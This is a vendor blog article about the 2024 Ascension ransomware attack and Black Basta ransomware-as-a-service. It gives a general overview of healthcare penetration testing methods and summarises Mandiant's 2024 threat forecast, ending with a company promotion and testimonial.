What happens when a healthcare system is hit by a cyberattack? Hospitals sever connections to their online systems. As a result, electronic health records systems, patient portals (which enable patients to view their medical records and communicate with their providers), phone systems, and various systems used to order certain tests, procedures, and medications become unavailable. Non-emergent procedures, tests, and appointments are paused. Staff don’t have patient orders and can’t page doctors. Medical, nursing, and clinical teams have to utilize manual processes or documentation methods that they moved away from 20 years ago. Switching to paper records and processing everything by hand, are again in place for various clinical activities, such as dispensing medication, inputting health records, ordering, and completing diagnostic tests and procedures. It's a disaster you never want to face.
Healthcare Ransomware Attacks
In May 2024, Ascension, one of the largest private healthcare systems in the United States, was hacked.
As a nurse in the emergency room at an Illinois Ascension hospital says, "we are doing three times the work, and it's taking double the time, not to mention critical patients who need to wait two to three times as long to get stat results for brain bleeds or blood clots. It is so unsafe; the staff is just so busy, overworked, and exhausted from dealing with rude patients. So many documents are going to go missing; everything is so disorganized it's unbelievable the amount of records that will go missing during this time. Now I'm going to work four times as hard, giving crappy patient care."
From May 8 to 14, Ascension staff were still struggling to address the “incident”.
However, it was not just an incident.
Health-ISAC organization, focused on sharing information regarding vulnerabilities, incidents, and threats to the security and privacy of healthcare data and systems, evaluates this attack as a 'major threat to the healthcare industry' in the USA.
The talk is about Black Basta, a ransomware-as-a-service that encrypts and steals patient data. They use the SaaS business model to sell malware kits to hackers (affiliates), who then use them to carry out their own ransomware attacks. Affiliates purchase a kit, receive malware and decryption keys, and, after hacking, demand money to decrypt files. Over the past two years, such a business model has already earned hackers 100 million dollars.
Health-ISAC suggests reviewing “The Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients Resources” issued by The United States Department of Health and Human Services.
In the section 'Sub-Practices for Large Organizations,' they specifically mention Penetration Testing.
Healthcare Penetration Testing
Penetration testing for healthcare is the process of controlled hacking into your own computer systems, networks, and applications before criminals have the chance to do the same and cause damage.
Penetration testing engineers conduct vulnerability scans (deep analysis of security flaws) and attempt to exploit the findings. They mimic the attack methodologies that adversaries might deploy and mix device-based, web application–based, and wireless-based attacks. The goal is to find what an attacker can do and fix discovered security holes yourself as soon as possible.
Each healthcare pen test must be documented and comply with legal and HR obligations.
Factors for Consideration in Healthcare Penetration Test Planning
Healthcare Penetration testing resources
Resources could be either internal staff who already know the technical nuances of your environment or external subject matter experts with specialized skill sets in security pentesting for healthcare.
Healthcare penetrations testing targets
There are the following penetration testing for medical IT targets could be:
- People. Compromise individuals to test educational controls or how susceptible they are to phishing attacks.
- Data. Discover and exfiltrate sensitive data to test data security controls.
- Medical technologies. Determine how vulnerable your organization is to attacks against medical devices.
- IT assets. Compromise IT assets, such as servers or API endpoints, to test system security controls or how vulnerable your organization is to ransomware attacks.
- Infrastructure. Determine how vulnerable your organization is to digital extortion attacks, such as ransomware outbreaks.
Types of healthcare penetration testing
Depending on the level of detail regarding the target you would like to share with a tester initially, there are three levels:
- Tester is permitted to know all aspects of the target.
- Tester is permitted to know some aspects of the target.
- Tester is not permitted to know any details of the target.
The more preliminary information the tester has, the faster they can discover the vulnerabilities during application security testing for healthcare.
Methods of Healthcare Penetration Testing
Here are the most common methods.
Social Engineering Penetration Tests
These are types of attacks geared towards “tricking the human.” The target is people. A tester tries to get an employee's password or data of another user. They can simulate domestic help services, messages from fake social media accounts, banks or government officials, and use pop-up alerts to trick victims into installing malicious applications on their devices.
Web Application Penetration Tests
These are attacks centered on web application infrastructure and its components like databases or source code. Examples include SQL injection, cross-site scripting, and DOS attacks.
Network Penetration Testing
Testers may use port scanners to locate weak entry points, such as unusual open ports (e.g., Port 80). After finding them, they may perform SQL Injection or Buffer Overflow attacks. If successful, the system will be compromised. However, it is still a trusted host inside the organization's network. From that point, the tester can freely move across the network and try to gain more access. For example, they can use Brute Force methods to guess passwords and gain deeper access.
Privilege escalation
These attacks aim to gain unauthorized higher-level access to delete databases, install malware, steal sensitive files, or disable core services.
These methods can be combined.
For example, if you want to understand if it is possible for an external attacker to gain access to your EMR, you might use social engineering, client-based, and privilege- escalation attacks.
The goal is to discover a user who has sensitive EMR access, compromise their credentials, and gain remote access to log in to the EMR with those credentials.
Cybersecurity Forecast 2024
Ascension engaged Mandiant, a cybersecurity company that provides incident response services to organizations facing cyber attacks. Mandiant is a part of Google Cloud’s security. Recently, they issued a Forecast 2024 report with thoughts on what organizations and security teams should think about today.
AI in phishing
More than 90% of all cyber attacks begin with phishing. It's a form of communication designed to appear legitimate, but aiming to steal personal information. It often starts with clicking on links in emails. Hackers now use generative AI and large language models to create personalized highly convincing phishing emails. They would even be able to create interactive fake phone calls and deepfake videos or photos.
Risks of using edge devices and virtualization software
Edge devices (like smart home devices, security cameras, etc.) and virtualization software (for running virtual machines) are very appealing targets for hackers.
These types of systems and devices are difficult to properly monitor and secure against attacks.
Hackers use previously unknown software vulnerabilities ("zero-day") to compromise more victims before the vulnerabilities are patched. Since the developers or vendors are unaware of these issues, they haven't had any time (zero days) to fix them.
Rise of wiper malware
Wiper malware is designed to delete data from a computer. It's not ransomware, which encrypts files and demands payment to unlock them. The sole purpose of a wiper is to permanently destroy all important documents, photos, and videos.
Vulnerabilities in cloud-based systems
Organizations increasingly use a combination of on-premises and cloud-based systems (hybrid) or multiple cloud platforms (multicloud). Attackers will try to take advantage of misconfigurations (incorrect settings) in how user identities are managed. If an attacker compromises one cloud environment, they might be able to infiltrate other connected cloud platforms. Organizations need to be extra vigilant in securing their hybrid and multicloud setups. Proper configurations and strong identity management practices prevent attackers from easily moving between different cloud environments.
Serverless services in the cloud are becoming more popular among cybercriminals
No user or device should be automatically trusted (zero-trust approach to security). Companies have to implement strong security measures for their serverless applications. There are tools to monitor serverless infrastructure for unexpected spikes in resource usage or unauthorized access attempts. Multi-factor authentication and the principle of least privilege when granting access to serverless resources can be helpful.
Sleeper botnets
Attackers may control 'sleeper botnets' after finding and using vulnerable Internet of Things (IoT) devices, small office and home office (SOHO) devices, outers, and end-of-life devices devices(that can’t receiving updates anymore) and that are often less secure and easier to exploit, especially when they are not running the latest firmware and security patches.
Unlike traditional botnets, 'sleeper botnets' are activated when the time comes for stealthy operations, such as data exfiltration or surveillance.
Periodic security assessments of networks and devices may identify vulnerabilities. It's also a good idea to separate your IoT and SOHO devices from your main network by placing them on a separate VLAN or subnet.
Attacks on pre-written packages
Developers may install a malicious NPM package that allows attackers to add a backdoor to developers' source code. This is a way to secretly access and control the software. Cybercriminals can compromise a large number of systems with the "help" of a single developer. It's a low-cost way for attackers to have a high impact.
It's expected that these kinds of attacks will become more common. Especially as attackers start to target package managers for programming languages, which may not be as closely monitored for security issues.
Belitsoft is a custom healthcare software development company that helps cybersecurity software product companies enlarge their teams of cybersecurity software developers and testers on a part time or full time basis. Check out our recent case study on the topic.
Rate this article
Belitsoft has been the driving force behind several of our software development projects within the last few years. This company demonstrates high professionalism in their work approach. They have continuously proved to be ready to go the extra mile. We are very happy with Belitsoft, and in a position to strongly recommend them for software development and support as a most reliable and fully transparent partner focused on long term business relationships.
Global Head of Commercial Development L&D at Technicolor